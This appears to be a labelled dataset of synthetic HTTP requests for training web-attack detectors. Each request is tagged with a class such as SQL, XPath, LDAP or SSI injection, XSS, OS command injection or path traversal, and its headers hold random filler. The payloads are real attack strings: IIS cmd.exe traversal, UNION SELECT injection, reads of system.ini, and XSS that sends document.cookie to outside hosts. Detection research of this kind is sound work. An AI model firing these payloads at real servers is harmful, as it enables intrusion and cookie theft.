Range: -7654,73-181
Referer: /aineuA/oEhn.pl
TE: trailers,trailers
User-Agent: iiuodee7od/5.0.1.8.1
UA-CPU: Sparc
UA-Disp: 684,759,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x705
Via: 2.7 185.9.79.0, 7.5 188.63.24.47
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35938
Start - Id: 39341
class: SSI
GET /3ap/wkJJ3R/dEgdROLnERUsEI1RQ/tgBo.mspx?oldtr0o=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&azaakihrictert0=0iei&EogP=aN HTTP/1.0
Host: www.er4rid.cz:0400
Connection: close
Accept: video/quicktime;q=0.6, text/*, text/*
Accept-Charset: gb2312, big5, cp-932;q=0.6
Accept-Encoding: *
Accept-Language: ea-enaSdN;q=0.9, deNpsRi-m6;q=0.5, hi-hea;q=0.1, he-nhlhew, Fntzbot-ehac;q=0.2
Cache-Control: dnhhtas='e4'
Client-ip: 153.213.53.71
Cookie: LMJ0BN6htpassmV=h"@"n;uotthoe=gensnooSnxtermteE;r6miife=kpd;theaTizCkeyuL=a\metxtr2v;eUjennhm=6;pneentdi7lc=rm\u
Cookie2: $Version="74"
Date: Sun, 22 May 05 07:12:12 GMT
ETag: "m@NBSc1mtH31OrU2y"
Expect: eaosil=rato;wWd9t9a4=Azad3
From: tuHdgsLz@bmsemyoDde.biz
If-Modified-Since: Wed, 14 Dec 05 22:38:21 GMT
If-Unmodified-Since: Tue, 01 Jul 08 02:42:00 UTC
If-Match: *
If-None-Match: "3mpmfDyxbeeWbZR"
If-Range: Mon, 09 May 05 14:44:23 UTC
Max-Forwards: 1036
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Basic anRodzppdXlvZDE=
Range: 422767-,0924-,61697-47592
Referer: /neebee.jpeg
TE: chunked;q=0.7
Trailer: Connection
User-Agent: eCOw0NB http://www.ribsy7r.be
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3324x441
Via: 7.4 www.maEu.js:859, 7.5 www.eteEnal.shtml
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39341
Start - Id: 40880
class: SSI
GET /astvtod6hfoiosao6tn/mefdflrrl/hlNoii2byrep/G67WA.Isock_streamca.oP/rpuhmy/qehgtsyo8ejpa/ewOeX.u0UDnrdOrxYU/scmj3oe4e/aYcVxnop03/tAeetohAtgeecleplecj.jpeg?Beoterrsgiooia=2&ioaf5amh=sgtstdinvp+uce1a&allB2MNbd51i=senpheipts++grcpi&Hn8r=tbTQzHXyJGYP&Keihcz8rie=tnajPm+wtsftpe&fmsre=+norlum&48co6t0bolTq=yDp-ZvB&grece=nOA-%40&OLXLrQWbjj=%3C%21--+++%23odbc++++connect%3D%22D1%2Cteign%2CoAnha%22++++++++statement%3D%22select+*++++from+++++eg%22--%3E&pasflartrs=tf_&bodyTmZATDr=fdrop6stdinphp&ezdtrkuetvS=mwo0sexec%3DEe-wasoxht%3Cen&lipDudu=f HTTP/1.1
Host: 163.241.27.28:9725
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=6084
Client-ip: 158.44.31.77
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="63"
Date: Fri, 16 Mar 07 17:22:18 GMT
ETag: W/"UmMV9Ao6ZHX35Yh@"
Expect: Bsieuw=kptnu;mohtt
From: xhslhnd@1eneubz.it
If-Modified-Since: Wed, 24 May 06 22:22:45 UTC
If-Unmodified-Since: Sat, 05 Feb 05 12:40:12 UTC
If-Match: "Cv.gMw8tU0yl0NvrNlYy"
If-None-Match: *
If-Range: *
Max-Forwards: 9739
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: 1-,-16972,856295-5
Referer: http://Weoy5t.de/ouo6wlp/derm/tjlyst/iylay.aspx
TE: deflate;q=0.9,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 5.4; ii-6p; rv:6.5.6) Gecko/26683763
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: FTP/3.5 212.113.104.246, 2.0 www.anteetit.css, 7.6 34.169.57.124
Transfer-Encoding: compress
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 64687084042208
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40880
Start - Id: 45864
class: PathTransversal
GET /6sN5IR-0xlSGh9ti._Q/iv1umad/iXsbAnRP2itPIp/iJSUZ9/e-A3due3S6OL@B/aEh/O-5vO/rfltsdniigsarumoa1/iuE_ZdIkxoewj7/5telnetkf.jpg?TA88cpre=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&crPt9=254&Ig5liosgs0u=thsmuiveo&ilhthal=dt8mimmadhnsEte&ses=iuoHhTnkas HTTP/1.0
Host: 156.200.50.232
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: euc-kr;q=0.7
Accept-Encoding: 
Accept-Language: ut-i, cpue-hhm5eetT;q=0.9, a-i;q=0.1
Cache-Control: no-store
Client-ip: 201.51.1.17
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="9"
Date: Fri, 05 Sep 08 06:32:16 CET
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Mon, 20 Oct 08 10:31:35 CET
If-Unmodified-Since: Sun, 19 Jul 09 21:20:33 CET
If-Match: *
If-None-Match: "r2XVw33r8ggBUxgz"
If-Range: "5QXw0MQIv0tVC47.D.4n"
Max-Forwards: 71
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: /dsYzae/uinsb/Ebeea.nsf
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (X11; U; Linux i586 7.0; bn-xa; rv:7.8.8) Gecko/11870779
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0549x672
Via: 2oa/7.2 www.otT17e.jpg
Transfer-Encoding: gzip
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45864
Start - Id: 38802
class: LdapInjection
GET /ekG.umscYAa/aG/hMdt1md2Toichnrnc.png?gVi3C=08&oLwp-x679from=03854&etidandvwaa=%292+osdnowao&iliib=mV0M1VCN&uowe7FlitCol=%3FtgfxiAdDtTnJse%27&ongufeNT=33&CNTwqpasswdMPH=%29%28++++%7C%282r%3Daidlg*%29&tz5HneB=tcdn HTTP/1.1
Host: 173.40.254.196
Connection: close
Accept: application/rtf;q=0.4, audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: s-nb, m4my-ina;q=0.3, n-ate, omatema-lrumId
Cache-Control: i='rrom'
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Mon, 16 Jun 08 05:28:16 GMT
ETag: "954BYt15GW0-QKluibg"
Expect: 100-continue
From: yRoml@orAqOa.ch
If-Modified-Since: Wed, 21 Apr 10 23:24:20 GMT
If-Unmodified-Since: Thu, 11 Mar 04 20:22:53 GMT
If-Match: "ZzBZb2KUg_iTlkV@"
If-None-Match: "ysKomA0DHbx6d0WQ"
If-Range: Mon, 30 Jul 07 08:42:50 CET
Max-Forwards: 8
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 89831-,-364983
Referer: http://ssvldeo.it/cotEgi/ir0et/dtttesEr/2th5e.nsf
TE: chunked;q=0.5,chunked;q=0.0,gzip
Trailer: Accept-Language
User-Agent: dnGuI/6.6.2
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/3.1 www.tUenorwu.shtml
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38802
Start - Id: 46605
class: XSS
GET /eoq7/sB/ttusrlselect8F/tqre4e2pne4tj/seaGar/shsre4eeaceyiTvdppE/etrbadWt4essoetU.mspx? HTTP/1.1
Host: www.tocoEnao.ch
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.6, x-mac-arabic;q=0.4, cp-932;q=0.1
Accept-Encoding: [\xC0][\xBC]script >[window.open('http://123.106.238.26/lade.jsp'+document.cookie);][\xC0][\xBC]/script   >
Accept-Language: f4ev-L
Cache-Control: only-if-cached
Client-ip: 151.185.246.142
Cookie: fGeOtjsa9dorxil=qesuhs4khtRtLs;MSNuID=723;ie=1fq3LJ;t6=dhyc< c8Gns;UhomeZbody3=a6
Cookie2: $Version="8"
Date: Sat, 03 Jul 04 05:08:28 UTC
ETag: W/"i1SzQL9_A_G6IGY"
Expect: 100-continue
From: cmafia1u@4a9he51St.com
If-Modified-Since: Wed, 19 Nov 08 22:58:06 CET
If-Unmodified-Since: Sat, 05 Feb 05 04:47:29 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 690
MIME-Version: 0.9
Pragma: ehsju=reo
Proxy-Authorization: sifg csiik=w7hiha
Authorization: 9iru rinrtild=ef2cniut
Range: 29-,197659-,4-7273
Referer: /i6oecee8/8eAhnir/cnWdmaOK/sscl.htm
TE: deflate;q=0.6
User-Agent: 1eaaoqenaei
UA-CPU: x86
Via: 8.5 64.150.85.215
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
X-Serial-Number: 1492216071266742097
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46605
Start - Id: 36460
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.a50b.ch
Connection: keep-alive
Accept: application/x-tar, text/*
Accept-Charset: koi8-r;q=0.0, x-mac-cyrillic, iso-8859-1
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 9.139.53.150
Cookie: teih7pNtwkvq=dJqaX_Kh;rtmrIDb1agittx=3264664;qn=rRW;dnad=n1eTe;oRLEsl9ewluren=1978958
Cookie2: $Version="374"
Date: Mon, 22 Sep 08 03:19:45 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: amnm6
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Mon, 08 Mar 10 04:09:38 GMT
If-Match: *
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: "C2iD83XH4OAhphnS@_PV"
Max-Forwards: 0771
MIME-Version: 8.8
Pragma: 5atcane='scenaiT'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM ZTJzdHl5QWVvbXM1c3UxZTRhZXJwbzVkMGMwZXh1ZXJhbGU=
Range: 57-,410056-,436232-1281
Referer: /zpaesf/wuhM/lritk/umtzs.png
TE: trailers,gzip
Trailer: Referer
User-Agent: iCNgOX http://www.eeim2y2r.gov
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 428x8640
Via: 7.7 248.224.250.230, 4.1 179.255.166.43:43357
Transfer-Encoding: deflate
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36460
Start - Id: 35765
class: XPathInjection
GET /dj-oxd8@dmj22bkl_-Ik.shtml?s7e6eOS_9L=n&ushsrbuatdti=dv2%27++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i+++%2B+++j++++%2B+k+%2B+++l%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++%270hcoatcO%27%3D++++%27++dhren%27+or&odeej4ara9e=nyGht&sEu=nin_LW8&m6it4lxe04=yv%3Bs0tesp&n2nieteptw=enateE4s6t2ial HTTP/1.0
Host: 5.34.172.158
Connection: sehqs
Accept: application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.1, deflate;q=0.4, compress, identity;q=0.8
Accept-Language: e-cb;q=0.1
Cache-Control: min-fresh=44617
Client-ip: 75.114.245.20
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Sat, 06 Nov 04 13:25:03 UTC
ETag: W/"tsvQDtbvV-90U6TPs"
Expect: 100-continue
From: an4poes@ktzh.com
If-Modified-Since: Thu, 02 Aug 07 08:53:55 UTC
If-Unmodified-Since: Sun, 04 Apr 10 11:30:12 CET
If-Match: *
If-None-Match: "v2EW69CIUg3iNHIfe92O"
If-Range: "uYqCyPZHoc7kpuw"
Max-Forwards: 9937
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b2ltZWJ0Z006eGU3Nmg=
Range: 9042-41
Referer: http://www.rrs32nen.it/ayol/taFcii/r8TaR.tiff
TE: chunked;q=0.0,gzip;q=0.5,deflate;q=0.8
Trailer: If-None-Match
User-Agent: srttu/0.9.5.5
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 4.1 207.52.93.23, 7.9 www.np0i.js
Transfer-Encoding: s4oia
Upgrade: a8sad/2.8, Tttcs/8.0
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35765
Start - Id: 41738
class: SqlInjection
GET /A5acoL8nObgsoundp.gif?osdt2hesZdjre=75&unli=erRltrimiprllaurl&mioloabedeXAti0=j%40qkj30&ecbj7=oaQVWG&cdoluis=p8rup9a+6H&tot=%3C9&d0hflcn0u=501790464&https1alnE=%27%29++++UNION++ALL++SELECT+++++cleeei5hso+++FROM+++++hed+++WHERE+%28%27%27++++%3D+%27&uorsr548earyn4i=01 HTTP/1.0
Host: 241.35.42.255:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: hsnyi-2arenatp, o9asDbln-7cd1a
Cache-Control: eOtiAcd=7A
Client-ip: 136.31.14.94
Cookie: yanthse34dK7wi0=an4igm~2athttcuopt%u];0aEtihdepyf=j;getnAnhoeid1a=tYIf;HkRusrdNmBEF=mrtkHtha1nupan;wiaPeemOtrt=EtLft>;Eat8ilaenis=0426
Cookie2: $Version="5"
Date: Fri, 10 Mar 06 06:25:01 CET
ETag: "3RzLyYlW.gVQq0ScRi"
Expect: 100-continue
From: jMelerog@d2JLz3sO.it
If-Modified-Since: Mon, 17 Oct 05 04:17:58 UTC
If-Unmodified-Since: Thu, 15 Feb 07 05:30:17 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 5
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic bnM2bnJ0bDpldmE5cU50
Range: -9158,6593-962,-115779
Referer: http://www.osnRo.it/9udhPe7/jedee.swf
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: vs7omitidaera7nf
UA-CPU: 68000
UA-Disp: 965,4025,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: HTTP/5.6 242.161.59.19, fee/0.9 www.c6inftl.gif, FTP/4.5 200.72.175.157
Transfer-Encoding: compress
Upgrade: OcN/3.5, 0iet/4.6, opaid/9.4, RiWniu/3.2, egwh/3.6
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41738
Start - Id: 35550
class: XPathInjection
POST /eK1IYx5LKIItwilaQnf/lthsdg/kDmINLpEXopen/eXxWaW/MbOpassthru@copybz/seeaA/tG7XXXLJRiW90V_.css? HTTP/1.1
Content-Length: 280
Content-Language: 2omOlur,sidek
Content-Encoding: deflate
Content-Location: /gEeOo.css
Content-MD5: b2lkY29ubnVpc3VmdjhodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Mon, 13 Sep 04 12:42:21 GMT
Host: 196.60.245.38:80
Connection: keep-alive
Accept: audio/*, image/*;q=0.4, audio/x-wav
Accept-Charset: windows-1257;q=0.2, x-mac-arabic;q=0.1, euc-jp;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: ii-s9an
Cache-Control: no-store
Client-ip: 89.252.62.136
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Sun, 15 Jan 06 17:46:32 UTC
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: r6prr@rraoosa.cz
If-Modified-Since: Sun, 06 Jul 08 20:29:05 GMT
If-Unmodified-Since: Sun, 25 Apr 10 06:11:16 UTC
If-Match: *
If-None-Match: "sMuaH3d4ST58x.S"
If-Range: "P1Lm2sc8jzbbKrH_S"
Max-Forwards: 14
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM eXNzc0FmbXNvZG41UzVlaHN0M25lbHhsdGtyNzFkdHJpcHM0
Range: 6-856001,00687-28
Referer: http://gtcseOhe.org/asurre/txiiwvl/sfbD/BeouEi8.shtml
TE: gzip;q=0.6
Trailer: If-Match
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 8.1; od-s2; rv:6.4.3) Gecko/65876101
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 5895x804
Via: 2.0 www.nydNn.jpeg
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Preplaceqj=ae eardstsieCSu&ez=sBy4d&ashtodlrewu=pvheeirN&ncan1Za=loJir/7/t/child::node()[position()=3]     or   'noarln'  ='&eooft78o=]&BLgCMcNdtZ=iee%uh:nodetioe drrx&zeesnbre4kywkad=?hike&Vasnt5b=naga&tgynbk1at=rQWqfkBl.ks&8aesE=taXnVeSL3

End - Id: 35550
Start - Id: 46593
class: XSS
GET /tEe5GoS4b5O/lq@hb@8t./.NsYuuWCFN/4_erNKgu4ae/hDNd/Enady.sh?J@xL7oTouTN=alse&ilslhg1tsbui9ug=hAmMTGrru&ugsaefm=86&thzdgocd1rbcnh=5u+Mr%3Er++rso&YHQL=et2&tTalrnte=pt+&bT6Bxterm8ylO=etuipsdseo&ro7hqot=l4dTeuudsrwht&pakd1ds=i2mz5on HTTP/1.1
Host: 249.137.88.118
Connection: tgoweke9
Accept: image/*, text/xml
Accept-Charset: x-mac-cyrillic, x-mac-icelandic
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 83.13.216.219
Cookie: Aa0hr= t2;gCfromG=so2n6plesth;td=evz;loc4bmndivce=gilhhuKtpann7otsft;hru2paSdnhrnleu=hto7IsfO9Iy
Cookie2: $Version="0"
Date: Sat, 12 Nov 05 11:43:42 UTC
ETag: W/"cLNGUk5ABafyFn7f3R"
Expect: 100-continue
From: eoshsh@qisp7eg.org
If-Modified-Since: Tue, 06 May 08 16:03:16 GMT
If-Unmodified-Since: Tue, 03 Nov 09 20:23:31 CET
If-Match: "D1nzZ0219KnRkvNi518t"
If-None-Match: *
If-Range: Fri, 06 May 05 03:43:51 CET
Max-Forwards: 260
MIME-Version: 1.9
Pragma: ica=oeicS4
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic YWhpUnl2aTplb3dB
Range: -2,441595-
Referer: http://www.h5irdn.it/cryw.asmx
TE: chunked;q=0.2,trailers,trailers
Trailer: Max-Forwards
User-Agent: <img   dynsrc =   "    javascript: [document.location.replace ('http://www.re.com/cgi-bin/eldengra.cgi'+document.cookie);]    ">
UA-CPU: Sparc
UA-Disp: 1938,517,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 7.6 166.187.3.255, 2.0 83.95.171.243, h3E/3.5 201.201.141.93:2082
Transfer-Encoding: identity
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 146.70.16.14
X-Serial-Number: 015353495234
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46593
Start - Id: 44311
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 60.86.66.35:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, x-mac-hebrew, windows-1258;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 18.62.79.179
Cookie: 4o@scripthtpassgt=mtmewl%rsdocumentd;nbUn=aestbd)vnodeti~o;htqaieieVhdbaaN=+e;es=S6Leh2Sairsaanddndh;lbgftr=hxOee;iib=~otsy 
Cookie2: $Version="933"
Date: Tue, 02 Feb 10 06:27:29 CET
ETag: "H6iIQzA7@Mrxsj9Scr"
Expect: 100-continue
From: leh3n2e@apiaad.biz
If-Modified-Since: Sun, 17 Jun 07 17:22:25 GMT
If-Unmodified-Since: Fri, 04 Aug 06 21:38:44 CET
If-Match: "CCiEzafJ6.IYM8u"
If-None-Match: "A7c7bTtAgzQPgGqy9qh"
If-Range: *
Max-Forwards: 6
MIME-Version: 0.6
Pragma: ny6oslot=ht
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic ZXI4YWY6ZUVubm44
Range: -2
Referer: http://www.tp2g3wg.com/hmpi/TiBe/mte0Ona/okbea.rar
TE: chunked,chunked,gzip
Trailer: Transfer-Encoding
User-Agent: as.m@_M http://www.Pjertw.com
UA-CPU: MIPS
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5984x276
Via: FTP/7.2 74.126.183.152, 1.0 www.rlsed9ar.css, 7.1 www.5E3at.js:35
Transfer-Encoding: gzip
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44311
Start - Id: 39461
class: SSI
GET /4hp/sV/rp/ehatisaaA/72_f/rc3/-kQ7rXXYWinputz5QQ/ee0/n3n/nbepataseii.css?et7uNrifs=%3C%21--%23email+fromhost%3D%22www.dCctwa.com%22+tohost%3D%22mailbox.htoy.com%22+message%3D%22eeIei7+4nyNein+vkzPki+td9y%22+fromaddress%3D%22hnfdy.com%22+toaddress%3D%22rxor0.ne3.com%22+subject%3D%22dt%22+sender%3D%22oo.com%22+replyto%3D%22menh6.com%22+cc%3D%22oSi%22+inreplyto%3D%22irorg+sOnn+tR9%22+id%3D%22lcan9mail%22+--%3E HTTP/1.0
Host: www.oe0meetehe.fr
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.1, compress, compress, gzip, identity;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 91.67.57.209
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Date: Sun, 18 Nov 07 19:01:31 UTC
ETag: W/"Tc8rYxsWH-fmGKZ4Sp"
Expect: ris5rtt=czils
From: a7fo@TTrA.it
If-Modified-Since: Wed, 18 Aug 04 06:12:49 UTC
If-Unmodified-Since: Sat, 02 Jun 07 07:12:15 CET
If-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Range: -2397
Referer: /fWhCsse/eibe.php
TE: chunked;q=0.3,deflate
Trailer: Referer
User-Agent: Mozilla/1.5 (compatible; MSIE 5.8; Solaris; esHl; i3psr5)
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
UA-Color: color32
Via: 8.0 0.50.210.36, 8.1 www.wz109.gif
Transfer-Encoding: compress
Upgrade: mwv/5.9, jxt9eh/8.4, lch/8.1, nSc/9.6
Warning: 728 www.fadyet.png "wm9iowri" "Sun, 18 Sep 05 04:10:06 CET"
----: --------------------------------------------

null

End - Id: 39461
Start - Id: 44577
class: OsCommanding
GET /bZB-ADY2N6cK8Z/bbetweenvrCVbodyuQJTU/wqbZV4K@Fi7/uT6zSShHbBS1iSWppLT/iXmlimv4wmo-Hcx-/pyqnSzQbPnOGESIy/ub_mjk/3JZGr@K99lRYhIEEv45/j_ntswowdipL.html?nibssstiasc2neg=oe&1Optianrrip=170.190.177.107%7C+++echo+%22test%22+%3Eevilfile.txt&permhTssnO=gnuuHalqto&hIeec=suhodNnuhtT%7CNtprt&8@YP8z6j_EB=sineatbo&D0rheee=tExbnuquf%40b&ajgalcstNdmLsdk=iier%2B&gin=057 HTTP/1.0
Host: www.hiedg.st
Connection: jm8owaae
Accept: text/*, audio/*, application/*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 161.135.140.107
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Date: Sat, 17 May 08 09:52:35 CET
ETag: "5lZWmVQ5I_0NdPW17aq1"
Expect: 100-continue
From: ne1pNm@taromiNse.be
If-Modified-Since: Thu, 11 May 06 09:10:30 UTC
If-Unmodified-Since: Thu, 18 Dec 08 05:16:17 CET
If-None-Match: *
If-Range: "-x@gyRuBYqkDCwoP"
Max-Forwards: 2380
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=nmcPts
Range: 746-,-10102
Referer: /aniAra7/6dheN4.gz
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: tT7XH4 http://www.dhteea.ch
Via: HTTP/2.5 31.37.238.229:80545
Transfer-Encoding: deflate
Upgrade: 93A/7.1, Vd8/3.3, stara7/6.4
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44577
Start - Id: 38041
class: LdapInjection
